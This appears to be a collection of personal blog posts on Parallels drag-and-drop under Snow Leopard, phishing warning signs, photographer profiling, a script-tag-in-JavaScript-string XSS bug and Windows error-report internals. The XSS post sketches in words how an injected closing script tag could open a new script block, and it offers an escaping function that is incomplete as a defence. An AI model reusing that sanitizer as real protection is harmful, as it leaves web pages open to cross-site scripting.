Drag’n’Drop Problems with Parallels 4

Since installing Snow Leopard, I can no longer Drag’n’Drop files from Windows to the hosting OS X environment, though the inverse works just fine. Is anyone else having this problem, because I’m not seeing much about it on the Parallel’s forums. I think the bug is real.

To say that I’m distrusting of Microsoft Windows’ security is putting things lightly. And when I’m in a situation where Microsoft’s anti-open standards force Microsoft as a necessity, I tend to use a virtual machine to sandbox its activities.

On Mac OS X, I use a wonderful product called Parallels, which has the added bonus of being able to drag’n’drop files and directories between the guest operating system (Windows) and the host operating system (OS X).

After installing the latest Snow Leopard (10.6), I found that while I could drag files into Windows from OS X, the reverse was no longer true. Dragging something from the Windows desktop out to the OS X desktop, which used to work in Leopard (10.5), simply results in nothing happening.

Parallels 4.x Shared Services Drag'n'Drop

Now, I’m aware that Apple did some pretty big changes under the hood in Snow Leopard. And, I’m aware that even the Finder got a fairly intensive overhaul. And, I’m even willing to accept that there might be bumps during the transition process, as the good folks at Parallels update their product to address little tidbits like this.

However, I’m kinda surprised that this kind of thing snuck past testing. Even more to my surprise is that I don’t hear many people talking about it. Such conclusions lead me to think that perhaps I have a local configuration issue.

But then I heard from another user of Parallels that updated to Snow Leopard. He ran into the same problem: Drag’n’Drop worked only in one direction now.

Most of the Snow Leopard fuss currently centers on the fact that Parallels 2.x and 3.x no longer work under Snow Leopard. Parallels made such a good and stable product that early users saw no need to update as it met their needs. However, Apple’s approach to operating systems is far more progressive than Microsoft’s, as they are willing to sacrifice backwards compatibility in software and hardware, if the technology is substantially old and the new benefits far outweigh the trouble. Thus, Apples tends to fix problems, rather than bandaid-ing workarounds; in the long haul everyone benefits with faster, smaller, more featured applications instead of bloatware.

However, I’m riding the Parallels 4.x wave on the bleeding edge. I’ve got the Parallels Tools installed. I’ve got the Enable Drag’n’Drop checked in the Shared Services config. Still, nothing.

I did a little digging around and found one user, Jamie Daniel, who was experiencing the same problem. As his question went unanswered, I tried myself.

I wrote an entry in the Parallels forum entitled Drag files from Guest to Host no longer working, detailing the problem.

And, while I was luckier than Jamie and got an answer, it was fairly clear someone gave a cursory glance and cut’n’pasted a response without reading what I was asking. In short that I did not want Windows to be able to read or write to any OS X drives. For, should Windows get a virus, I didn’t want it having free reign of the OS X filesystem to corrupt. Thus only I, via Drag’n’Drop, should be able to marshal content between the two environments.

Willing to accept the fact that I may have a configuration problem, despite being a power user of Parallels since day one, I am also willing to accept that this is simply a Snow Leopard compatibility issue that Parallels will soon be addressing. Problem is, I can’t seem to raise the issue to a level where someone can confirm or deny it.

Worse yet, I can’t seem to be able to login to Windows via the Finder anymore to mouse a Windows disk within OS X, where as I used to be able to do that as well. While workarounds, from using a USB disk (which mounts in both environments), DropBox, and using the Windows Guest account’s Parallel’s mount point, I’d really like the old capability back.

So, I ask, Parallels 4.x users that are using Snow Leopard, are you no longer able to drag from Windows to the OS X desktop?

If you can, how are you doing it?

If you can’t, please head over to the Parallels forum and let them know it’s broken for you as well. This is not an attack Parallels request, they’re good people — this is just to raise awareness to let them know the issue is real so they can look into it.

UPDATE 14-Sep-2009: Found a work around, but I’m not happy about it. What I don’t like about it is that it appears to expose Windows disks to OS X. While I trust OS X, the inverse does not appear to be necessary to perform a Drag’n’Drop from OS X to Windows. I’d expect the Enable Drag-and-Drop to be enough.

If you turn on the Share All Disks with OS X, then Drag’n’Drop from the Windows desktop to OS X Desktop works.

Parallels 4 Drag'n'Drop Hack

Seven Phishing Warning Signs

Got a very well done phishing email today, but I’m more impressed with Bank of America’s abuse response letter — they distilled down seven simple warning signs to tell that you’re being Phished. This is something useful to pass on to the less email-savvy people in your life.

This morning I received an email from “Bank of America” asking me to click on the link included to verify some information that’s been changed with my banking details.

Well, given that I was addressed as “Dear Reliable Customer,” and that I don’t have an account with Bank of America, I was pretty sure this was a phishing attack. Viewing the raw form of the message, which exposes the HTML, further confirmed that the email was not from Bank of America, nor was the link for verification destined for Bank of America’s servers.

Normally, I put such stuff in my spam folders, but this one impressed me. It was good. Very good. The email actually used what look like an old banner from Bank of America’s site to produce quite an authentic branded email. It did so by making an image tag to a real Bank of America server.

As such, I felt it was worth the time to gather all the server information I could and pass it along to Bank of America, with the hopes that either their technicians or lawyers would be able to have a field day with the sender.

Not only did I get a nice reply back from Bank of America, but I have to say they really have their act together!

Check out this simple 7-point list they passed on that concisely helps customers identify when they might be defrauded by a scammer.

Source: Bank of America’s email

The main goal of a phishing email is to get you to a site where you will provide your personal information. With these basic, but powerful, clues, you can easily recognize the threat and ensure the safety of your identity and finances.

1. Does the email ask you to go to a website and verify personal information? We won’t ask you to verify your personal information in response to an email.
2. What is the tone of the mail? Most phish emails convey a sense of urgency by threatening discontinued service or information loss if you don’t take immediate action.
3. What is the quality of the email? Many phish emails have misspellings, bad grammar, or poor punctuation.
4. Are the links in the email valid? Deceptive links in phishing emails look like they are to a valid site, but deliver you to a fraudulent one. Many times you can see if the link is legitimate by just moving your mouse over the link.
5. Is the email personalized with your name and applicable account information? Many phish emails use generic salutations and generic information (e.g. “Dear Customer” or “Dear Account Holder”) instead of your name.
6. What is the sender’s email address? Many phish emails come from an email address not from the company represented in the email.
7. When in doubt, type it out. If you suspect an email to be phishing, don’t click on any links in the email. Type the valid address directly into your web browser.

Wonderful advice. And it applies to more than just banking emails.

Thank you, Bank of America. It’s something simple I can pass along to friends and family.

Photographers a Threat? Uh, no.

Bruce Schneier talks about The War on Photographer, where photographers are presumed to be terrorists. This stuck a chord with me, as I’m a photographer, and I have been stopped in the manner Bruce describes.

In Bruce Schneier‘s CRYPTO-GRAM, he includes a reprint of a fantastic article entitled The War on Photography.

Excerpt:

Since 9/11, there has been an increasing war on photography. Photographers have been harassed, questioned, detained, arrested or worse, and declared to be unwelcome. We’ve been repeatedly told to watch out for photographers, especially suspicious ones. Clearly any terrorist is going to first photograph his target, so vigilance is required.

Except that it’s nonsense. The 9/11 terrorists didn’t photograph anything. Nor did the London transport bombers, the Madrid subway bombers, or the liquid bombers arrested in 2006. Timothy McVeigh didn’t photograph the Oklahoma City Federal Building. The Unabomber didn’t photograph anything; neither did shoe-bomber…

As a photographer, I have been stopped by security guards, questioned why I was photographing a building, and probed who I was working for. Bruce explains while not only is this nonsense, but a waste of resources and money.

The article’s short. Take a moment to read it. It brings common sense back to the equation.

I’m a photographer, and if I take a picture of something, it’s because I like it and want to preserve it for others to enjoy too.

Using In A JavaScript Literal

Today I got bit by a very interesting bug involving the tag. If you’re writing code that generates code, you want to know about this.

I’m currently working on an application that takes content from various web resources, munges the content, stores it in a database, and on demand generates interactive web pages, which includes the ability to annotate content in a web editor. Things were humming along great for weeks until we got a stream of data which made the browser burp with a JavaScript syntax error.

Problem was, when I examined the automatically generated JavaScript, it looked perfectly good to my eyes.

So, I reduced the problem down to a very trivial case.

What would you suppose the following code block does in a browser?

<HTML>
<BODY>
  start
  <SCRIPT>
    alert( "</SCRIPT>" );
  </SCRIPT>
  finish
</BODY>
</HTML>

Try it and see.

To my eyes, this should produce an alert box with the simple text </SCRIPT> inside it. Nothing special.

However, in all browsers (IE 7, Firefox, Opera, and Safari) on all platforms (XP/Vista/OS X) it didn’t. The close tag inside the quoted literal terminated the scripting block, printing the closing punctuation.

Change </SCRIPT> to just <SCRIPT>, and you get the alert box as expected.

So, I did more reading and more testing. I looked at the hex dump of the file to see if perhaps there was something strange going on. Nope, plain ASCII.

I looked at the JavaScript documentation online, and the other thing they suggest escaping are the single and double quotes, as well as the backslash which does the escaping. (Note we’re using forward slashes, which require no escapes in a JavaScript string.)

I even got the 5th Edition of JavaScript: The Definitive Guide from O’Reilly, and on page 27, which lists the comprehensive escape sequences, there is nothing magical about the forward slash, nor this magic string.

In fact, if you start playing with other strings, you get these results:
  <SCRIPT> …works
  <A/B> …works
  </STRONG> …works
  <\/SCRIPT> …displays </SCRIPT>, and while I suppose you can escape a forward slash, there should be no need to. Ever. See prior example.
  </SCRIPT> …breaks
  </SCRIPTX> …works (note the extra character, an X)

With JavaScript, what’s in quotes is supposed to be flat, literal, uninterpreted, meaningless test.

It was after this I turned to ask for help from several security and web experts.

Security Concerns


Why security experts?

The primary concern is obviously cross site scripting. We’re taking untrusted sites and displaying portions of the data stream. Should an attacker be able to insert </SCRIPT> into the stream, a few comment characters, and shortly reopen a new <SCRIPT> block, he’d be able to mess with cookies, twiddle the DOM, dink with AJAX, and do things that compromise the trust of the server.

The Explanation


The explanation came from Phil Wherry.

As he puts it, the <SCRIPT> tag is content-agnostic. Which means the HTML Parser doesn’t know we’re in the middle of a JavaScript string.

What the HTML parser saw was this:

<HTML>
<BODY>
  start
  <SCRIPT>alert( "</SCRIPT>
  " );
  </SCRIPT>
  finish
</BODY>
</HTML>

And there you have it, not only is the syntax error obvious now, but the HTML is malformed.

The processing of JavaScript doesn’t happen until after the browser has understood which parts are JavaScript. Until it sees that close </SCRIPT> tag, it doesn’t care what’s inside – quoted or not.

Turns out, we all have seen this problem in traditional programming languages before. Ever run across hard-to-read code where the indentation conveys a block that doesn’t logically exist? Same thing. In this case instead of curly braces or begin/end pairs, it was the start and end tags of the JavaScript.

Upstream Processing


Remember, this wasn’t hand-rolled JavaScript. It was produced by an upstream piece of code that generated the actual JavaScript block, which is much more complex than the example shown.

It is getting an untrusted string. Which, to shove inside of a JavaScript string not only has to be sanitized, but also escaped in such a way that the HTML parser cannot accidentally treat the string’s contents as a legal (or illegal!) tag.

To do this we need to build a helper function to scrub data that will directly be emitted as a raw JavaScript string.


  1. Escape all backslashes, replacing \ with \\, since backslash is the JavaScript escape character. This has to be done first as not to escape other escapes we’re about to add.
  2. Escape all quotes, replacing ' with \', and " with \" — this stops the string from getting terminated.
  3. Escape all angle brackets, replacing < with \<, and > with \> — this stops the tags from getting recognized.

private String safeJavaScriptStringLiteral(String str) {

  str = str.replace(“\\”,”\\\\”); // escape single backslashes
  str = str.replace(“'”,”\\'”); // escape single quotes
  str = str.replace(“\””,”\\\””); // escape double quotes
  str = str.replace(“<“,”\\<“); // escape open angle bracket
  str = str.replace(“>”,”\\>”); // escape close angle bracket
  return str;
}

At this point we should have generated a JavaScript string which never has anything that looks like a tag in it, but is perfectly safe to an XML parser. All that’s needed next is to emit the JavaScript surrounded by a <![CDATA[]]> block, so the HTML parser doesn’t get confused over embedded angle brackets.

From a security perspective, I think this also goes to show that lone JavaScript fragment validation isn’t enough; one has to take it in the full context of the containing HTML parser. Pragmatically speaking, the JavaScript alone was valid, but once inside HTML, became problematic.

Behind the Blue Screen of Death, Is Microsoft Vunerable?

XP suffered a Blue Screen of Death due to a very simple cause, but this got the gears going — are phone-home-on-error systems vulnerable and not getting the attention they deserve?

This morning I came in to work and discovered my Windows XP desktop in a crashed state, you know the one, the Blue Screen of Death; the same one you see billboard sized at Times Square.

Given that I’m meticulous about patches, clean registry settings, and an army of spyware, malware, and anti-virus detectors, not to mention the machine is used for very limited purposes, it’s very likely this isn’t some bad 3rd party Windows driver. Oh, no, the error message squarely put the blame on the USB driver.

Knowing that, I can think back to what my very last activities were at the end of the day. I saved a file in a simple editor, that file was on my Dell USB stick, and after it saved, I initiated a Windows Reboot, and pulled my USB stick (whose activity light was well extinguished) and walked at the door as Windows was still shutting down.

I’m going to simply conclude that Windows was so “busy” with its shutdown that it didn’t “see” the USB device get removed, and it was left in some horrified state that it had to die (something that does not happen with my Mac, ever). This is further confirmed by the fact that, after a hard power reset, XP came up fine, and all of my diagnostic utilities passed. Windows had just, plain and simply, died.

Sometime after booting, however, I got a message that Windows had detected it had shutdown in a bad manner, and it wanted to know if it was okay to send the report to Microsoft. I’m all for making things better, but I thought it might be interesting to look into the post-Blue Screen of Death activities.

The Blue Screen of Death did a crash dump and some files were written to disk in a directory called C:\Documents and Settings\{username}\Local Settings\Temp\WEReeed.dir00.

The file manifest.txt consisted of name/value pairs separated by an equal sign, in much the same way as the contents of an .ini file might be done, sans section headers.

The more curious contents of this file revealed the server, a url, and some values, what data files were being sent, and a very obscure reference to what might be a “blue” screen report.

Server=watson.microsoft.com
Stage2URL=/dw/bluetwo.asp?BCCode=1000007e&BCP1=C0000005&
BCP2=BA2C4371&BCP3=BA503AF4&BCP4=BA5037F0&
OSVer=5_1_2600&SP=2_0&Product=256_1
DataFiles=C:\DOCUME~1\{username}\LOCALS~1\Temp\
WEReeed.dir00\Mini022207-01.dmp|C:\DOCUME~1\{username}\
LOCALS~1\Temp\WEReeed.dir00\sysdata.xml
ErrorSubPath=blue

The sysdata.xml file consisted of an XML file that listed every device, its description, hardware id, service, and driver, often the version and file size as well. Sure enough, the usehub.sys file was there, buried in the batch. It simply appears this file is trying to collect the configuration of the machine, perhaps to recreate it in the lab for some regression testing and battery of comprehensively abusive test suites. At least that’s what I would hope happens.

The Mini022207-01.dump is clearly the month/day/year-sequence_number of when the dump was made. When the Blue Screen of Death happened, it claimed it was dumping all of physical memory. Given this Mini-Dump is only 92K, some post-processing has clearly taken place.

In my case, the file was clearly a page dump of a section of memory, with what looked like uninitialized memory labeled with the bytes literally reading “PAGE”. Inside, this binary blob it was very easy to make out pgfilter.sys, USBSTOR.SYS, and kmixer.sys. Other device driver names and binary glop followed.

Actually submitting the report showed that watson.microsoft.com (as in the product Dr. Watson) was queried and an IP of 65.54.206.43 came back. An https: exchange was made, and moments later oca.partners.extranet.microsoft.com (131.107.112.111) was ask of the DNS server; more content was sent to that server. wwwbaytest5.microsoft.com (207.46.18.30) was then asked for a certificate, via GET /pki/mscorp/Microsoft%20Secure%20Sever%20Authority(3).crt; a few more of these went back and forth, and wer.microsoft.com (131.107.115.67) got involved, that when my browser reported the human readable response to the report. Compounding matters, no tracking number or email address is provided, so even if I wanted to provide Microsoft with more information to help them fix the problem, I can’t.

After all this happened another thought struck me… Microsoft doesn’t really have a good track record with security, especially when it comes to error checking and services that aren’t used that much. I ponder what would have happened if the information had been tampered with before being sent? Is there invalid input that could send the error reporting systems into a tizzy? Could some bogus changes make their debugger or tool execute malicious code? Would some false data send some poor analysis team chasing fictional ghosts? What would happen if an automated script kiddie generated millions of bogus machine crash reports; how would they get sorted out?

I ask the question because there are quite a number of phone-home-if-you-see-a-problem systems out there in popular open source projects. Seems to me that there should be solid secure conventions to detect if error report data has been tampered with, or is bogus, and to prevent the same kinds of attacks regular systems suffer from. This is something worth spending some design time on, even if it isn’t part of the main product functionality.

Update: Suffered another crash, this time in the ATI driver as the system was doing nothing and changing focus from one window to another. Oddly enough, again, all the diagnostics say the system is fine — I’m going to do a very intensive sweep.

For the curious, the new directory was WERdb4a.dir00 with similar manifest, dump, and sysdata files. WER is the Windows Error Report, and the stuff after it appears to be hex glop. This time it is blaming the video driver, so I’ll be checking if there are any updates with both Dell and ATI.